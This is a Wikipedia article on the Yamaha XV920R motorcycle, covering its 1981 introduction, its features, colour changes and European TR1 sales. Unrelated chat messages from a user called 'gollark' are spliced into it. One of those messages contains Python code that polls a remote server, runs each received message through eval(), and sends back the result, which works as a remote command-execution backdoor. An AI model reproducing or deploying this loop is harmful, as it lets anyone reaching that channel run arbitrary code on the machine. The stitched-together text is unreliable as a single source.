Yamaha XV920R

The Yamaha XV920R is a Japanese motorcycle. It was introduced in 1981, along with the XV750 Virago. In addition to larger engine displacement it featured "standard" styling and technical features, in contrast to the cruiser style of the Virago . This model was geared toward European-style sport touring.

The XV920R had a unique enclosed chain final drive, a large, 8-inch-diameter (200 mm) headlamp, a high-capacity sculpted fuel tank, and rear-set controls and footpegs. Like the Virago, it had a stamped-steel backbone frame, also serving as part of the air-induction system. It had a mono-shock rear suspension, with (air) preload and damper adjustments. The front suspension had air preload adjustment only.[1]

In 1981 (XV920RH) it was offered only in candy metalflake maroon. In 1982 (XV920RJ), the only color offered in the United States was silver with black trim. US sales were discontinued after 1982, with many units still unsold. The rear end styling, with its swingarm-mounted fender (now commonplace), drew much criticism. The bike was also sold in Europe with 980 cc displacement, and called "TR1".[2] European sales were more successful, and continued, with slight styling and color modifications (including a switch to more 'mainstream' rear-end styling), through 1986.

Notes and references

  1. "Yamaha Virago 1981-1999". Archived from the original on 22 February 2012. Retrieved 16 March 2018.
  2. German Wikipedia article about the TR1
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
gollark: It has some great new features now, like long polling mode.
gollark: You mean SPUDNET? I think I may have broken that URL in the osmarks.net migration. Use spudnet.osmarks.net.
gollark: With features like "not signing everything with one root key" and such.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.